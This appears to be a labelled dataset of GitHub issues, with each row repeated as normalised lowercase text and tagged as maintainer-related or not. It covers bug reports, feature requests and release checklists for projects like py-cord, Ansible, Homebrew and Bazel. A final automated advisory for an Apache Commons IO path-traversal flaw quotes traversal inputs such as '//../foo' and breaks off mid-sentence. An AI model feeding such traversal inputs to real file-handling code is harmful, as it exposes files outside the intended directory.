await injected(ctx) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 135, in wrapped raise ApplicationCommandInvokeError(exc) from exc discord.errors.ApplicationCommandInvokeError: Application Command raised an exception: Forbidden: 403 Forbidden (error code: 50001): Missing Access ``` and when you select an other item in the dropdown you get ``` Ignoring exception in view <Paginator timeout=180.0 children=2> for item <PaginatorMenu placeholder='Select Page Group' min_values=1 max_values=1 options=[<SelectOption label='label 1' value='label 1' description=None emoji=None default=False>, <SelectOption label='label 2' value='label 2' description=None emoji=None default=False>] disabled=False>: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ui\view.py", line 375, in _scheduled_task await item.callback(interaction) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 1150, in callback return await self.paginator.update( File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 522, in update await self.goto_page(self.current_page, interaction=interaction) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 630, in goto_page message_id=self.message.id, AttributeError: 'NoneType' object has no attribute 'id' ``` ### Intents default ### System Information - Python v3.9.4-final - py-cord v2.0.0-final - aiohttp v3.7.3 ### Checklist - [X] I have searched the open issues for duplicates. - [X] I have shown the entire traceback, if possible. - [X] I have removed my token from display, if visible. ### Additional Context _No response_
True
ext.pages message is none if "View Channel" permissions are missing - ### Summary If the bot does not have "View Channel" permissions, exceptions are not catched ### Reproduction Steps ```py @slash_command() async def test(self, ctx): await ctx.defer() # Note: The defer is needed! Otherwise it works page_groups = [] page_groups.append(pages.PageGroup(pages="1", label="label 1")) page_groups.append(pages.PageGroup(pages="2", label="label 2")) paginator = pages.Paginator(pages=page_groups, show_disabled=False, show_menu=True) await paginator.respond(ctx.interaction, ephemeral=False) ``` ### Minimal Reproducible Code _No response_ ### Expected Results That it should either work (like without `defer`) or catch the exception :) ### Actual Results On `/test` you get: ``` Ignoring exception in command test: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 127, in wrapped ret = await coro(arg) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 877, in _invoke await self.callback(self.cog, ctx, **kwargs) File "g:\develop\bot\cogs\stuff.py", line 403, in test await paginator.respond(ctx.interaction, ephemeral=False) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 1068, in respond msg = await msg.channel.fetch_message(msg.id) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\abc.py", line 1601, in fetch_message data = await self._state.http.get_message(channel.id, id) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\http.py", line 354, in request raise Forbidden(response, data) discord.errors.Forbidden: 403 Forbidden (error code: 50001): Missing Access The above exception was the direct cause of the following exception: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\bot.py", line 992, in invoke_application_command await ctx.command.invoke(ctx) File 
"g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 358, in invoke await injected(ctx) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 135, in wrapped raise ApplicationCommandInvokeError(exc) from exc discord.errors.ApplicationCommandInvokeError: Application Command raised an exception: Forbidden: 403 Forbidden (error code: 50001): Missing Access ``` and when you select an other item in the dropdown you get ``` Ignoring exception in view <Paginator timeout=180.0 children=2> for item <PaginatorMenu placeholder='Select Page Group' min_values=1 max_values=1 options=[<SelectOption label='label 1' value='label 1' description=None emoji=None default=False>, <SelectOption label='label 2' value='label 2' description=None emoji=None default=False>] disabled=False>: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ui\view.py", line 375, in _scheduled_task await item.callback(interaction) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 1150, in callback return await self.paginator.update( File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 522, in update await self.goto_page(self.current_page, interaction=interaction) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 630, in goto_page message_id=self.message.id, AttributeError: 'NoneType' object has no attribute 'id' ``` ### Intents default ### System Information - Python v3.9.4-final - py-cord v2.0.0-final - aiohttp v3.7.3 ### Checklist - [X] I have searched the open issues for duplicates. - [X] I have shown the entire traceback, if possible. - [X] I have removed my token from display, if visible. ### Additional Context _No response_
main
ext pages message is none if view channel permissions are missing summary if the bot does not have view channel permissions exceptions are not catched reproduction steps py slash command async def test self ctx await ctx defer note the defer is needed otherwise it works page groups page groups append pages pagegroup pages label label page groups append pages pagegroup pages label label paginator pages paginator pages page groups show disabled false show menu true await paginator respond ctx interaction ephemeral false minimal reproducible code no response expected results that it should either work like without defer or catch the exception actual results on test you get ignoring exception in command test traceback most recent call last file g develop bot venv pycord lib site packages discord commands core py line in wrapped ret await coro arg file g develop bot venv pycord lib site packages discord commands core py line in invoke await self callback self cog ctx kwargs file g develop bot cogs stuff py line in test await paginator respond ctx interaction ephemeral false file g develop bot venv pycord lib site packages discord ext pages pagination py line in respond msg await msg channel fetch message msg id file g develop bot venv pycord lib site packages discord abc py line in fetch message data await self state http get message channel id id file g develop bot venv pycord lib site packages discord http py line in request raise forbidden response data discord errors forbidden forbidden error code missing access the above exception was the direct cause of the following exception traceback most recent call last file g develop bot venv pycord lib site packages discord bot py line in invoke application command await ctx command invoke ctx file g develop bot venv pycord lib site packages discord commands core py line in invoke await injected ctx file g develop bot venv pycord lib site packages discord commands core py line in wrapped raise applicationcommandinvokeerror 
exc from exc discord errors applicationcommandinvokeerror application command raised an exception forbidden forbidden error code missing access and when you select an other item in the dropdown you get ignoring exception in view for item traceback most recent call last file g develop bot venv pycord lib site packages discord ui view py line in scheduled task await item callback interaction file g develop bot venv pycord lib site packages discord ext pages pagination py line in callback return await self paginator update file g develop bot venv pycord lib site packages discord ext pages pagination py line in update await self goto page self current page interaction interaction file g develop bot venv pycord lib site packages discord ext pages pagination py line in goto page message id self message id attributeerror nonetype object has no attribute id intents default system information python final py cord final aiohttp checklist i have searched the open issues for duplicates i have shown the entire traceback if possible i have removed my token from display if visible additional context no response
1
999
4,761,580,318
IssuesEvent
2016-10-25 08:42:52
ansible/ansible-modules-extras
https://api.github.com/repos/ansible/ansible-modules-extras
closed
Add proxied support to CloudFlare
affects_2.1 feature_idea networking waiting_on_maintainer
##### ISSUE TYPE - Feature Idea ##### COMPONENT NAME cloudflare_dns.py ##### ANSIBLE VERSION ``` ansible 2.1.0.0 config file = configured module search path = Default w/o overrides ``` ##### CONFIGURATION N/A ##### OS / ENVIRONMENT N/A ##### SUMMARY I would be really great if you can add support for the CloudFlare "proxied" flag, so that you can set true/false flag on creation and/or update of records ##### STEPS TO REPRODUCE ``` - name: "Create @ A Record 1" cloudflare_dns: zone: example.com type: A value: 10.10.10.10 proxied: true account_email: "{{ cloudflare_email }}" account_api_token: "{{ cloudflare_api_token }}" register: record ``` ##### EXPECTED RESULTS This would turn on CloudFlare's DNS/HTTP proxy ##### ACTUAL RESULTS ``` ok: [localhost] => {"changed": false, "invocation": {"module_args": {"account_api_token": "VALUE_SPECIFIED_IN_NO_LOG_PARAMETER", "account_email": "sam@madjungle.com", "port": null, "priority": 1, "proto": null, "record": "@", "service": null, "solo": null, "state": "present", "timeout": 30, "ttl": 1, "type": "A", "value": "10.10.10.10", "weight": 1, "zone": "example.com"}, "module_name": "cloudflare_dns"}, "result": {"record": {"content": "10.10.10.10", "created_on": "2016-07-18T11:10:09.100198Z", "id": "1234567890", "locked": false, "meta": {"auto_added": false}, "modified_on": "2016-07-18T11:10:09.100198Z", "name": "example.com", "proxiable": true, "proxied": true, "ttl": 1, "type": "A", "zone_id": "1234567890", "zone_name": "example.com"}}} ```
True
Add proxied support to CloudFlare - ##### ISSUE TYPE - Feature Idea ##### COMPONENT NAME cloudflare_dns.py ##### ANSIBLE VERSION ``` ansible 2.1.0.0 config file = configured module search path = Default w/o overrides ``` ##### CONFIGURATION N/A ##### OS / ENVIRONMENT N/A ##### SUMMARY I would be really great if you can add support for the CloudFlare "proxied" flag, so that you can set true/false flag on creation and/or update of records ##### STEPS TO REPRODUCE ``` - name: "Create @ A Record 1" cloudflare_dns: zone: example.com type: A value: 10.10.10.10 proxied: true account_email: "{{ cloudflare_email }}" account_api_token: "{{ cloudflare_api_token }}" register: record ``` ##### EXPECTED RESULTS This would turn on CloudFlare's DNS/HTTP proxy ##### ACTUAL RESULTS ``` ok: [localhost] => {"changed": false, "invocation": {"module_args": {"account_api_token": "VALUE_SPECIFIED_IN_NO_LOG_PARAMETER", "account_email": "sam@madjungle.com", "port": null, "priority": 1, "proto": null, "record": "@", "service": null, "solo": null, "state": "present", "timeout": 30, "ttl": 1, "type": "A", "value": "10.10.10.10", "weight": 1, "zone": "example.com"}, "module_name": "cloudflare_dns"}, "result": {"record": {"content": "10.10.10.10", "created_on": "2016-07-18T11:10:09.100198Z", "id": "1234567890", "locked": false, "meta": {"auto_added": false}, "modified_on": "2016-07-18T11:10:09.100198Z", "name": "example.com", "proxiable": true, "proxied": true, "ttl": 1, "type": "A", "zone_id": "1234567890", "zone_name": "example.com"}}} ```
main
add proxied support to cloudflare issue type feature idea component name cloudflare dns py ansible version ansible config file configured module search path default w o overrides configuration n a os environment n a summary i would be really great if you can add support for the cloudflare proxied flag so that you can set true false flag on creation and or update of records steps to reproduce name create a record cloudflare dns zone example com type a value proxied true account email cloudflare email account api token cloudflare api token register record expected results this would turn on cloudflare s dns http proxy actual results ok changed false invocation module args account api token value specified in no log parameter account email sam madjungle com port null priority proto null record service null solo null state present timeout ttl type a value weight zone example com module name cloudflare dns result record content created on id locked false meta auto added false modified on name example com proxiable true proxied true ttl type a zone id zone name example com
1
4,173
19,988,162,808
IssuesEvent
2022-01-31 00:07:00
Homebrew/homebrew-cask
https://api.github.com/repos/Homebrew/homebrew-cask
closed
Re-open handbrake-cli PR
awaiting maintainer feedback stale
### Provide a detailed description of the proposed feature The pull request https://github.com/Homebrew/homebrew-cask/pull/109484 adds a separate `handbrake-cli` cask, since the current `handbrake` cask doesn't install HandbrakeCLI automatically. We should re-open and merge the PR. ### What is the motivation for the feature? This [StackOverflow thread](https://apple.stackexchange.com/questions/85731/how-do-i-install-handbrake-cli#comment461916_188200) has some more detail - it appears that the CLI was extracted to a separate DMG file on the Handbrake website at some point in time. In my own testing, the HandbrakeCLI needed to be downloaded from https://handbrake.fr/downloads2.php instead. ### Example use case ``` brew install handbrake-cli HandbrakeCLI -h ```
True
Re-open handbrake-cli PR - ### Provide a detailed description of the proposed feature The pull request https://github.com/Homebrew/homebrew-cask/pull/109484 adds a separate `handbrake-cli` cask, since the current `handbrake` cask doesn't install HandbrakeCLI automatically. We should re-open and merge the PR. ### What is the motivation for the feature? This [StackOverflow thread](https://apple.stackexchange.com/questions/85731/how-do-i-install-handbrake-cli#comment461916_188200) has some more detail - it appears that the CLI was extracted to a separate DMG file on the Handbrake website at some point in time. In my own testing, the HandbrakeCLI needed to be downloaded from https://handbrake.fr/downloads2.php instead. ### Example use case ``` brew install handbrake-cli HandbrakeCLI -h ```
main
re open handbrake cli pr provide a detailed description of the proposed feature the pull request adds a separate handbrake cli cask since the current handbrake cask doesn t install handbrakecli automatically we should re open and merge the pr what is the motivation for the feature this has some more detail it appears that the cli was extracted to a separate dmg file on the handbrake website at some point in time in my own testing the handbrakecli needed to be downloaded from instead example use case brew install handbrake cli handbrakecli h
1
732,785
25,276,548,361
IssuesEvent
2022-11-16 13:02:42
episphere/biospecimen
https://api.github.com/repos/episphere/biospecimen
closed
Rename "Comments" to "Feedback" on the Packages Receipts and Shipping Report pages
enhancement Priority 2
Please rename "Comments" to "Feedback" on the receipts page and shipping report page. This is solely a change in name, not function. See the images below for guidance. ![Screen Shot 2022-11-14 at 8 53 10 AM](https://user-images.githubusercontent.com/85250133/201677649-b577107c-97a4-4536-b257-352a90827727.png) ![Screen Shot 2022-11-14 at 8 53 31 AM](https://user-images.githubusercontent.com/85250133/201677658-6ce70c9c-c960-4261-9f24-b251a505e27b.png)
1.0
Rename "Comments" to "Feedback" on the Packages Receipts and Shipping Report pages - Please rename "Comments" to "Feedback" on the receipts page and shipping report page. This is solely a change in name, not function. See the images below for guidance. ![Screen Shot 2022-11-14 at 8 53 10 AM](https://user-images.githubusercontent.com/85250133/201677649-b577107c-97a4-4536-b257-352a90827727.png) ![Screen Shot 2022-11-14 at 8 53 31 AM](https://user-images.githubusercontent.com/85250133/201677658-6ce70c9c-c960-4261-9f24-b251a505e27b.png)
non_main
rename comments to feedback on the packages receipts and shipping report pages please rename comments to feedback on the receipts page and shipping report page this is solely a change in name not function see the images below for guidance
0
369
3,362,460,720
IssuesEvent
2015-11-20 05:56:21
jenkinsci/slack-plugin
https://api.github.com/repos/jenkinsci/slack-plugin
closed
Release slack plugin 1.8.1
maintainer communication
This issue is to track progress of releasing slack plugin 1.8.1. TODO: - [x] Configure your credentials in `~/.m2/settings.xml`. (outlined in [making a new release][plugin-release] doc) - [x] Create a new issue to track the release and give it the label `maintainer communication`. - [x] Create a release branch. `git checkout origin/slack-1.8-stable -b prepare_release` - [x] Update the release notes in `CHANGELOG.md`. - [x] Open a pull request from `prepare_release` branch to `slack-1.8-stable` branch. Merge it. - [x] Fetch the latest `slack-1.8-stable`. - [x] Execute the release plugin. ``` mvn org.apache.maven.plugins:maven-release-plugin:2.5:prepare org.apache.maven.plugins:maven-release-plugin:2.5:perform ``` - [x] Wait for the plugin to be released into the Jenkins Update Center. - [x] Successfully perform an upgrade from the last stable plugin release to the current release. I pin which version of the release plugin to use because of the working around common issues section of the [release document][plugin-release]. [plugin-release]: https://wiki.jenkins-ci.org/display/JENKINS/Hosting+Plugins
True
Release slack plugin 1.8.1 - This issue is to track progress of releasing slack plugin 1.8.1. TODO: - [x] Configure your credentials in `~/.m2/settings.xml`. (outlined in [making a new release][plugin-release] doc) - [x] Create a new issue to track the release and give it the label `maintainer communication`. - [x] Create a release branch. `git checkout origin/slack-1.8-stable -b prepare_release` - [x] Update the release notes in `CHANGELOG.md`. - [x] Open a pull request from `prepare_release` branch to `slack-1.8-stable` branch. Merge it. - [x] Fetch the latest `slack-1.8-stable`. - [x] Execute the release plugin. ``` mvn org.apache.maven.plugins:maven-release-plugin:2.5:prepare org.apache.maven.plugins:maven-release-plugin:2.5:perform ``` - [x] Wait for the plugin to be released into the Jenkins Update Center. - [x] Successfully perform an upgrade from the last stable plugin release to the current release. I pin which version of the release plugin to use because of the working around common issues section of the [release document][plugin-release]. [plugin-release]: https://wiki.jenkins-ci.org/display/JENKINS/Hosting+Plugins
main
release slack plugin this issue is to track progress of releasing slack plugin todo configure your credentials in settings xml outlined in making a new release doc create a new issue to track the release and give it the label maintainer communication create a release branch git checkout origin slack stable b prepare release update the release notes in changelog md open a pull request from prepare release branch to slack stable branch merge it fetch the latest slack stable execute the release plugin mvn org apache maven plugins maven release plugin prepare org apache maven plugins maven release plugin perform wait for the plugin to be released into the jenkins update center successfully perform an upgrade from the last stable plugin release to the current release i pin which version of the release plugin to use because of the working around common issues section of the
1
177,151
6,574,846,190
IssuesEvent
2017-09-11 14:16:15
inverse-inc/packetfence
https://api.github.com/repos/inverse-inc/packetfence
opened
LDAP Source: authenticate+authorize never ending connection
Priority: High Type: Bug
Right now in LDAP we have a connection timeout which is used passed onto IO::Socket according to Net::LDAP perldoc. I have seen an issue where the pfqueue workers are not recovering from a temporary LDAP connection issue and are stuck reading from the LDAP TCP socket (strace reports its reading from the file descriptor associated to that TCP connection). That connection is maintaining as ESTABLISHED but seems none of the two parties in the connection are saying a thing. We should: - [ ] See if we can find anything about the underlying bug which is the never ending connection - [ ] Have a global timeout when doing any LDAP query in Authentication::Source::LDAPSource to have a full safety net in case anything goes wrong during that process
1.0
LDAP Source: authenticate+authorize never ending connection - Right now in LDAP we have a connection timeout which is used passed onto IO::Socket according to Net::LDAP perldoc. I have seen an issue where the pfqueue workers are not recovering from a temporary LDAP connection issue and are stuck reading from the LDAP TCP socket (strace reports its reading from the file descriptor associated to that TCP connection). That connection is maintaining as ESTABLISHED but seems none of the two parties in the connection are saying a thing. We should: - [ ] See if we can find anything about the underlying bug which is the never ending connection - [ ] Have a global timeout when doing any LDAP query in Authentication::Source::LDAPSource to have a full safety net in case anything goes wrong during that process
non_main
ldap source authenticate authorize never ending connection right now in ldap we have a connection timeout which is used passed onto io socket according to net ldap perldoc i have seen an issue where the pfqueue workers are not recovering from a temporary ldap connection issue and are stuck reading from the ldap tcp socket strace reports its reading from the file descriptor associated to that tcp connection that connection is maintaining as established but seems none of the two parties in the connection are saying a thing we should see if we can find anything about the underlying bug which is the never ending connection have a global timeout when doing any ldap query in authentication source ldapsource to have a full safety net in case anything goes wrong during that process
0
5,208
26,464,330,565
IssuesEvent
2023-01-16 21:17:36
bazelbuild/intellij
https://api.github.com/repos/bazelbuild/intellij
closed
Flag --incompatible_disable_starlark_host_transitions will break IntelliJ UE Plugin in Bazel 7.0
type: bug product: IntelliJ topic: bazel awaiting-maintainer
Incompatible flag `--incompatible_disable_starlark_host_transitions` will be enabled by default in the next major release (Bazel 7.0), thus breaking IntelliJ UE Plugin. Please migrate to fix this and unblock the flip of this flag. The flag is documented here: [bazelbuild/bazel#17032](https://github.com/bazelbuild/bazel/issues/17032). Please check the following CI builds for build and test results: - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42fc-481a-b548-09370831fe55) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42f7-4441-90ce-33e243117428) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42ff-4f70-a4b0-0eef7d237e6f) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-4309-4cac-8378-295d1599ab46) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-4303-4aad-b069-5b2e4ebfc432) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-430d-4dec-a666-753e8ad6bab1) Never heard of incompatible flags before? We have [documentation](https://docs.bazel.build/versions/master/backward-compatibility.html) that explains everything. If you have any questions, please file an issue in https://github.com/bazelbuild/continuous-integration.
True
Flag --incompatible_disable_starlark_host_transitions will break IntelliJ UE Plugin in Bazel 7.0 - Incompatible flag `--incompatible_disable_starlark_host_transitions` will be enabled by default in the next major release (Bazel 7.0), thus breaking IntelliJ UE Plugin. Please migrate to fix this and unblock the flip of this flag. The flag is documented here: [bazelbuild/bazel#17032](https://github.com/bazelbuild/bazel/issues/17032). Please check the following CI builds for build and test results: - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42fc-481a-b548-09370831fe55) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42f7-4441-90ce-33e243117428) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-42ff-4f70-a4b0-0eef7d237e6f) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-4309-4cac-8378-295d1599ab46) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-4303-4aad-b069-5b2e4ebfc432) - [Ubuntu 18.04 OpenJDK 11](https://buildkite.com/bazel/bazelisk-plus-incompatible-flags/builds/1365#0185154b-430d-4dec-a666-753e8ad6bab1) Never heard of incompatible flags before? We have [documentation](https://docs.bazel.build/versions/master/backward-compatibility.html) that explains everything. If you have any questions, please file an issue in https://github.com/bazelbuild/continuous-integration.
main
flag incompatible disable starlark host transitions will break intellij ue plugin in bazel incompatible flag incompatible disable starlark host transitions will be enabled by default in the next major release bazel thus breaking intellij ue plugin please migrate to fix this and unblock the flip of this flag the flag is documented here please check the following ci builds for build and test results never heard of incompatible flags before we have that explains everything if you have any questions please file an issue in
1
3,996
18,522,865,063
IssuesEvent
2021-10-20 16:49:57
WarenGonzaga/buymeacoffee.js
https://api.github.com/repos/WarenGonzaga/buymeacoffee.js
closed
sponsor and supporter badge broken images
bug maintainers only
I'm aware that the badges are broken on all of my projects due to the issue in my recent subdomain. I'm moving my digital assets to the new domain name.
True
sponsor and supporter badge broken images - I'm aware that the badges are broken on all of my projects due to the issue in my recent subdomain. I'm moving my digital assets to the new domain name.
main
sponsor and supporter badge broken images i m aware that the badges are broken on all of my projects due to the issue in my recent subdomain i m moving my digital assets to the new domain name
1
45,014
23,864,446,045
IssuesEvent
2022-09-07 09:48:15
sapphiredev/shapeshift
https://api.github.com/repos/sapphiredev/shapeshift
opened
request: `setValidationEnabled` should [un]wrap the validator into an `PartialValidator<T>`
performance
### Is there an existing issue or pull request for this? - [X] I have searched the existing issues and pull requests ### Feature description Right now, all validators have checks for whether or not they should run validations, as seen below: https://github.com/sapphiredev/shapeshift/blob/e9a029a995d6863dfa07ef3493b7da1568ddabef/src/validators/BaseValidator.ts#L74-L78 This comes with a large performance impact, specially from those who desire to use the library without conditional validation. Also goes against Shapeshift's internal design of running the least amount of conditionals as possible. Before we added conditional validation, Shapeshift was comfortably among the fastest libraries in our benchmarks. ### Desired solution A wrapper would solve the performance impact by making the validators always run the logic and constraints, where the `PartialValidator<T>` would exclusively only run the handler and never the constraints (with no extra checks, of course). For function (dynamic validation), we can also add a second class, or add a check in `PartialValidator<T>`, invalidating the last sentence in the previous paragraph. Unwrapping a `PartialValidator<T>` should give back the underlying, fully-checked validator. ### Alternatives considered N/a. ### Additional context _No response_
True
request: `setValidationEnabled` should [un]wrap the validator into an `PartialValidator<T>` - ### Is there an existing issue or pull request for this? - [X] I have searched the existing issues and pull requests ### Feature description Right now, all validators have checks for whether or not they should run validations, as seen below: https://github.com/sapphiredev/shapeshift/blob/e9a029a995d6863dfa07ef3493b7da1568ddabef/src/validators/BaseValidator.ts#L74-L78 This comes with a large performance impact, specially from those who desire to use the library without conditional validation. Also goes against Shapeshift's internal design of running the least amount of conditionals as possible. Before we added conditional validation, Shapeshift was comfortably among the fastest libraries in our benchmarks. ### Desired solution A wrapper would solve the performance impact by making the validators always run the logic and constraints, where the `PartialValidator<T>` would exclusively only run the handler and never the constraints (with no extra checks, of course). For function (dynamic validation), we can also add a second class, or add a check in `PartialValidator<T>`, invalidating the last sentence in the previous paragraph. Unwrapping a `PartialValidator<T>` should give back the underlying, fully-checked validator. ### Alternatives considered N/a. ### Additional context _No response_
non_main
request setvalidationenabled should wrap the validator into an partialvalidator is there an existing issue or pull request for this i have searched the existing issues and pull requests feature description right now all validators have checks for whether or not they should run validations as seen below this comes with a large performance impact specially from those who desire to use the library without conditional validation also goes against shapeshift s internal design of running the least amount of conditionals as possible before we added conditional validation shapeshift was comfortably among the fastest libraries in our benchmarks desired solution a wrapper would solve the performance impact by making the validators always run the logic and constraints where the partialvalidator would exclusively only run the handler and never the constraints with no extra checks of course for function dynamic validation we can also add a second class or add a check in partialvalidator invalidating the last sentence in the previous paragraph unwrapping a partialvalidator should give back the underlying fully checked validator alternatives considered n a additional context no response
0
18,822
3,088,935,116
IssuesEvent
2015-08-25 19:03:20
zinic/pyrox
https://api.github.com/repos/zinic/pyrox
closed
Connection is not closed after rejecting request from a filter
defect
The connection is closed during a normal request, but not when you intercept the request, ie via a filtering.reject()
1.0
Connection is not closed after rejecting request from a filter - The connection is closed during a normal request, but not when you intercept the request, ie via a filtering.reject()
non_main
connection is not closed after rejecting request from a filter the connection is closed during a normal request but not when you intercept the request ie via a filtering reject
0
103,096
16,601,982,387
IssuesEvent
2021-06-01 20:52:25
samq-ghdemo/SEARCH-NCJIS-nibrs
https://api.github.com/repos/samq-ghdemo/SEARCH-NCJIS-nibrs
opened
CVE-2021-29425 (Medium) detected in commons-io-2.6.jar, commons-io-2.5.jar
security vulnerability
## CVE-2021-29425 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>commons-io-2.6.jar</b>, <b>commons-io-2.5.jar</b></p></summary> <p> <details><summary><b>commons-io-2.6.jar</b></p></summary> <p>The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-io/">http://commons.apache.org/proper/commons-io/</a></p> <p>Path to dependency file: SEARCH-NCJIS-nibrs/tools/nibrs-route/pom.xml</p> <p>Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,canner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,SEARCH-NCJIS-nibrs/web/nibrs-web/target/nibrs-web/WEB-INF/lib/commons-io-2.6.jar</p> <p> Dependency Hierarchy: - tika-parsers-1.18.jar (Root Library) - :x: **commons-io-2.6.jar** (Vulnerable Library) </details> <details><summary><b>commons-io-2.5.jar</b></p></summary> <p>The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and 
much more.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-io/">http://commons.apache.org/proper/commons-io/</a></p> <p>Path to dependency file: SEARCH-NCJIS-nibrs/tools/nibrs-fbi-service/pom.xml</p> <p>Path to vulnerable library: SEARCH-NCJIS-nibrs/tools/nibrs-fbi-service/target/nibrs-fbi-service-1.0.0/WEB-INF/lib/commons-io-2.5.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.5/commons-io-2.5.jar</p> <p> Dependency Hierarchy: - :x: **commons-io-2.5.jar** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/samq-ghdemo/SEARCH-NCJIS-nibrs/commit/2643373aa9a184ff4ea81e98caf4009bf2ee8e91">2643373aa9a184ff4ea81e98caf4009bf2ee8e91</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "\\..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value. 
<p>Publish Date: 2021-04-13 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-29425>CVE-2021-29425</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: None - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29425">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29425</a></p> <p>Release Date: 2021-04-13</p> <p>Fix Resolution: commons-io:commons-io:2.7</p> </p> </details> <p></p> <!-- 
<REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"Java","groupId":"commons-io","packageName":"commons-io","packageVersion":"2.6","packageFilePaths":["/tools/nibrs-route/pom.xml","/tools/nibrs-flatfile/pom.xml","/tools/nibrs-staging-data-common/pom.xml","/web/nibrs-web/pom.xml","/tools/nibrs-summary-report-common/pom.xml","/tools/nibrs-summary-report/pom.xml","/tools/nibrs-xmlfile/pom.xml","/tools/nibrs-common/pom.xml","/tools/nibrs-validate-common/pom.xml","/tools/nibrs-staging-data/pom.xml","/tools/nibrs-validation/pom.xml"],"isTransitiveDependency":true,"dependencyTree":"org.apache.tika:tika-parsers:1.18;commons-io:commons-io:2.6","isMinimumFixVersionAvailable":true,"minimumFixVersion":"commons-io:commons-io:2.7"},{"packageType":"Java","groupId":"commons-io","packageName":"commons-io","packageVersion":"2.5","packageFilePaths":["/tools/nibrs-fbi-service/pom.xml"],"isTransitiveDependency":false,"dependencyTree":"commons-io:commons-io:2.5","isMinimumFixVersionAvailable":true,"minimumFixVersion":"commons-io:commons-io:2.7"}],"baseBranches":["master"],"vulnerabilityIdentifier":"CVE-2021-29425","vulnerabilityDetails":"In Apache Commons IO before 